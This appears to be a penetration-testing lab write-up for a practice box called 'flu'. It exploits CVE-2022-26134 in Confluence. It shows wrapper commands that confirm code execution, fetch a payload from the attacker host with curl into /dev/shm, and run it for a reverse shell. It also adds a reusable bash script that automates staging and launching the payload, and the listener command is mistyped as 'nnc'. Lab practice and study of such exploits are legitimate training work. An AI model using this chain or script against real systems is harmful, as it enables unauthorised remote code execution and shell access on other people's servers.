RCE
The target Confluence instance is expected to be vulnerable to CVE-2022-26134, an unauthenticated OGNL injection in Confluence Server and Data Center; the version reported by the exploit wrapper below (7.13.6) predates the fixed 7.13.7 release, so a harmless command is run first to confirm execution before any payload is staged.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu/CVE-2022-26134]
└─$ python3 cve-2022-26134.py http://$IP:8090 'id'
Confluence target version: 7.13.6
uid=1001(confluence) gid=1001(confluence) groups=1001(confluence)
Code execution confirmed
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu/CVE-2022-26134]
└─$ python3 cve-2022-26134.py http://$IP:8090 'curl -s http://192.168.45.198/shell -o /dev/shm/shell'
Confluence target version: 7.13.6
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu/CVE-2022-26134]
└─$ python3 cve-2022-26134.py http://$IP:8090 'chmod 755 /dev/shm/shell'
Confluence target version: 7.13.6
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu/CVE-2022-26134]
└─$ python3 cve-2022-26134.py http://$IP:8090 '/dev/shm/shell'
Confluence target version: 7.13.6
Transferring and executing the payload. Note that the wrapper prints only its version banner for the curl, chmod and execution calls, so nothing here confirms the transfer succeeded; success is only shown by the callback to the listener below.
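The four wrapper invocations above, folded into one script as an added example that is not part of the original write-up. It adds the check the listing lacks: because the wrapper prints nothing for the curl and chmod steps, the script hashes the payload locally and on the target and only launches it when the two SHA-256 values match. Assumptions: cve-2022-26134.py is the same wrapper used above (taking a base URL and a single command, and echoing the command's output after its version banner), the payload file is in the current directory and already served over HTTP from the attacking host, and the function names and the `run` argument are mine, not the wrapper's.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up). Repeatable staging of a
# payload through the CVE-2022-26134 wrapper with an integrity check.
set -eu

# Defaults taken from the listing above; override via the environment.
TARGET="${TARGET:-http://${IP:-192.168.144.41}:8090}"
LHOST="${LHOST:-192.168.45.198}"        # attacking host serving the payload
PAYLOAD_NAME="${PAYLOAD_NAME:-shell}"   # local file name == remote file name
REMOTE_PATH="/dev/shm/${PAYLOAD_NAME}"

# Run one command on the target via the wrapper and return its output,
# with the "Confluence target version: ..." banner stripped.
run_remote() {
    python3 cve-2022-26134.py "$TARGET" "$1" | sed '/^Confluence target version/d'
}

# Pull the first 64-hex-character token out of sha256sum-style output.
sha256_of_output() {
    printf '%s\n' "$1" | grep -oE '[0-9a-f]{64}' | head -n1
}

# Step 1: confirm code execution, using a uid= line as the success signal.
confirm_rce() {
    local out
    out="$(run_remote 'id')"
    case "$out" in
        *uid=*) printf '%s\n' "$out"; return 0 ;;
        *)      echo "no uid in response: ${out:-<empty>}" >&2; return 1 ;;
    esac
}

# Steps 2 and 3: fetch the payload, make it executable, then verify that the
# remote hash matches the local file before anything is run. Prints the hash.
stage_payload() {
    local local_hash remote_hash
    local_hash="$(sha256sum "$PAYLOAD_NAME" | cut -d' ' -f1)"
    run_remote "curl -s http://${LHOST}/${PAYLOAD_NAME} -o ${REMOTE_PATH}" >/dev/null
    run_remote "chmod 755 ${REMOTE_PATH}" >/dev/null
    remote_hash="$(sha256_of_output "$(run_remote "sha256sum ${REMOTE_PATH}")")"
    if [ "$local_hash" != "$remote_hash" ]; then
        echo "transfer failed: local ${local_hash} remote ${remote_hash:-<none>}" >&2
        return 1
    fi
    printf '%s\n' "$remote_hash"
}

# Step 4: execute the payload. Backgrounded locally because the HTTP request
# behind the wrapper may not return while the reverse shell is alive.
launch_payload() {
    run_remote "$REMOTE_PATH" &
}

# Only act when explicitly asked, so sourcing the file defines the functions
# without touching the target:  ./stage.sh run
case "${1:-}" in
    run) confirm_rce && stage_payload && launch_payload ;;
esac
```

Start the listener (as in the next listing) before invoking `./stage.sh run`; a hash mismatch stops the script before the execute step, which is exactly the point at which the original sequence would otherwise run an incomplete or missing file.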
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu/CVE-2022-26134]
└─$ nnc 8091
listening on [any] 8091 ...
connect to [192.168.45.198] from (UNKNOWN) [192.168.144.41] 56972
whoami
confluence
hostname
flu
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:08:79 brd ff:ff:ff:ff:ff:ff
altname enp3s0
inet 192.168.144.41/24 brd 192.168.144.255 scope global ens160
valid_lft forever preferred_lft forever
Initial foothold established on the target system as the confluence service account by exploiting CVE-2022-26134.